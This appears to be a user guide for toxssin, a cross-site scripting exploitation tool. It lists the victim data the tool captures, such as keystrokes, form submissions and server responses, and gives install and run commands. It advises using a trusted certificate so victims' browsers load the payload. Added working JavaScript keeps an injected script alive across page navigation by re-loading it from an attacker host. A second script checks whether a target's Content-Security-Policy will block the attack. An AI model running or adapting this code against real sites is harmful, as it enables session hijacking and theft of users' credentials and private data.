The impact of these attacks ranges from small changes that merely affect a user's experience to far-reaching damage, depending on the sensitivity of the data handled by the vulnerable site and on whatever mitigations are in place.
Once toxssin's JavaScript payload is running in a victim's browser, it intercepts and reports back to the toxssin server:
- keystrokes,
- paste events,
- input change events,
- file selections,
- form submissions,
- server responses,
- table data.
Some important features of toxssin:
- It tries to achieve XSS persistence while the user browses the site: the HTTP requests the page makes and their responses are intercepted and the document is rebuilt from them in place, so although the user appears to navigate, the location of the document never actually changes and the payload keeps running;
- Supports session management: you can exploit multiple targets simultaneously, e.g. by running a series of XSS-based phishing attacks or by exploiting a stored XSS;
- Supports running custom JS scripts in sessions: once a browser is connected, you can execute your own JavaScript in it;
- Automatically records every session.
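To make the persistence trick above concrete, here is an added sketch of navigating a page in place without ever unloading it. This is illustrative code written for this page, not toxssin's own implementation: PAYLOAD_SRC is an assumed attacker-controlled URL, the pure helpers (shouldIntercept, reinjectPayload) run anywhere, and the browser glue at the bottom only runs when a document object exists.

```javascript
// Added example, not toxssin's own code: one way to keep an XSS payload alive
// across what the user perceives as navigation. Same-origin link clicks are
// intercepted, the target page is fetched in the background, the payload's
// <script> tag is re-inserted into the fetched HTML, and the current document
// is rewritten in place, so the page never unloads and the payload never dies.
// PAYLOAD_SRC is an assumed attacker-controlled URL.
const PAYLOAD_SRC = 'https://attacker.example/payload.js';

// Only same-origin http(s) targets are handled in place; cross-origin URLs,
// mailto:, javascript: and malformed hrefs fall through to normal navigation.
function shouldIntercept(href, currentOrigin) {
  let target;
  try {
    target = new URL(href, currentOrigin);
  } catch (e) {
    return false;
  }
  if (target.protocol !== 'http:' && target.protocol !== 'https:') return false;
  return target.origin === currentOrigin;
}

// Re-insert the payload so it is executed again when the fetched HTML is
// written into the document. Prefer the end of <head>, then the start of
// <body>, otherwise prepend it to the markup.
function reinjectPayload(html, src = PAYLOAD_SRC) {
  const tag = '<script src="' + src + '"></script>';
  if (/<\/head>/i.test(html)) return html.replace(/<\/head>/i, tag + '</head>');
  if (/<body[^>]*>/i.test(html)) return html.replace(/<body[^>]*>/i, (m) => m + tag);
  return tag + html;
}

// Browser side: fetch the page with the victim's cookies, move the address
// bar with pushState, and replace the document contents without unloading.
async function navigateInPlace(href) {
  const res = await fetch(href, { credentials: 'include' });
  const html = reinjectPayload(await res.text());
  history.pushState({}, '', href);
  document.open();
  document.write(html);
  document.close();
}

if (typeof document !== 'undefined') {
  document.addEventListener('click', (ev) => {
    const a = ev.target.closest ? ev.target.closest('a[href]') : null;
    if (!a || !shouldIntercept(a.href, location.origin)) return;
    ev.preventDefault();
    navigateInPlace(a.href);
  });
}
```

Form submissions and XHR/fetch responses are hooked in the same spirit (a submit listener, and wrapping window.fetch or XMLHttpRequest.prototype.open). Note that the re-injected script tag is subject to the same Content-Security-Policy as the original injection, which is why CSP is listed among the obstacles further down.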
Installation and use
git clone https://github.com/t3l3machus/toxssin
cd toxssin
pip3 install -r requirements.txt
To run toxssin.py you need a TLS certificate and its private key, because the toxssin server speaks HTTPS. A self-signed pair for testing can be generated with the following command:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
As written, openssl will prompt for a passphrase and encrypt key.pem with it; add -nodes (or -noenc on OpenSSL 3) if you want an unencrypted key the server can load without prompting.
A self-signed certificate will be rejected by victims' browsers (see the obstacles below), so it is recommended that you run toxssin with a certificate from a trusted CA. You can then start the toxssin server as follows (replace the domain and file paths with your own):
# python3 toxssin.py -u https://your.domain.com -c /your/certificate.pem -k /your/privkey.pem
You will find more details in the project's README at https://github.com/t3l3machus/toxssin.
XSS exploitation difficulties
The major obstacles when it comes to Cross-Site Scripting attacks with toxssin are:
- The "NET::ERR_CERT_AUTHORITY_INVALID" error: the victim's browser refuses to fetch the payload from the toxssin server when the server's certificate is untrusted (e.g. self-signed) or has expired. This is bypassed by using a certificate issued by a CA the browser trusts, such as Let's Encrypt.
- Cross-origin resource sharing (CORS): the payload makes cross-origin requests from the vulnerable site to the toxssin server. The toxssin server sends the CORS headers these requests need, so nothing has to be done on your side.
- The Content-Security-Policy header: if script-src (or default-src, which script-src falls back to) lists only specific domains, the browser will refuse to load a script with a cross-domain src, so the payload cannot be fetched from the toxssin server. Toxssin also relies on eval() to deliver its payload, so if the site sets a CSP and 'unsafe-eval' is not specified in script-src, the attack will most likely fail. Check the target's Content-Security-Policy response header before you start.
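Before pointing toxssin at a target, it is worth reading the site's Content-Security-Policy header and checking the three things the obstacle above turns on: whether an external script may be loaded from your origin, whether inline script is allowed at the injection point, and whether eval() is permitted. The following checker is an added example written for this page, not part of toxssin; the header strings in its test are constructed samples and https://attacker.example stands in for the origin of your toxssin server.

```javascript
// Added example, not part of toxssin: given a Content-Security-Policy header
// value and the origin the payload will be loaded from, report whether the
// policy allows (a) an external script from that origin, (b) inline script,
// and (c) eval(). The attacker origin is an assumption standing in for the
// toxssin server; header values fed to it are constructed samples.

// Split the header into directives; per the spec, only the first occurrence
// of a directive name is honoured.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

// script-src falls back to default-src; with neither there is no restriction.
function scriptSources(directives) {
  if ('script-src' in directives) return directives['script-src'];
  if ('default-src' in directives) return directives['default-src'];
  return null;
}

// Does one host-source expression (e.g. https://cdn.example, *.example.com,
// https:, *) match the given origin?
function hostMatches(pattern, origin) {
  const u = new URL(origin);
  const defaultPort = u.protocol === 'https:' ? '443' : '80';
  let p = pattern.toLowerCase();
  if (p === '*') return true;
  if (p === 'https:' || p === 'http:') return u.protocol === p;
  let scheme = null;
  const m = p.match(/^([a-z][a-z0-9+.-]*):\/\//);
  if (m) {
    scheme = m[1] + ':';
    p = p.slice(m[0].length);
  }
  const hostPort = p.split('/')[0];
  const host = hostPort.split(':')[0];
  const port = hostPort.split(':')[1];
  if (scheme && scheme !== u.protocol) return false;
  if (port && port !== '*' && port !== (u.port || defaultPort)) return false;
  if (host.startsWith('*.')) return u.hostname.endsWith(host.slice(1));
  return host === u.hostname;
}

// Summarise what the policy lets an XSS payload do from attackerOrigin.
function evaluateCsp(header, attackerOrigin) {
  const srcs = scriptSources(parseCsp(header));
  if (srcs === null) {
    return { externalScript: true, inlineScript: true, eval: true };
  }
  const keywords = new Set(srcs.filter((s) => s.startsWith("'")).map((s) => s.toLowerCase()));
  const hosts = srcs.filter((s) => !s.startsWith("'"));
  const hasNonceOrHash = [...keywords].some((k) => /^'(nonce-|sha(256|384|512)-)/.test(k));
  const strictDynamic = keywords.has("'strict-dynamic'");
  return {
    // host allow-lists are ignored under 'strict-dynamic'
    externalScript: !strictDynamic && hosts.some((h) => hostMatches(h, attackerOrigin)),
    // 'unsafe-inline' is ignored once a nonce or hash is present
    inlineScript: keywords.has("'unsafe-inline'") && !hasNonceOrHash && !strictDynamic,
    eval: keywords.has("'unsafe-eval'"),
  };
}
```

A target answering with script-src 'self' blocks both the external payload and eval(), so toxssin will not work there unless you can host the payload on the target itself (e.g. through a file upload). A policy with a nonce or hash and no 'unsafe-inline' stops the injected script from running at all, before CORS or eval() even come into play.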
You can download the program from https://github.com/t3l3machus/toxssin.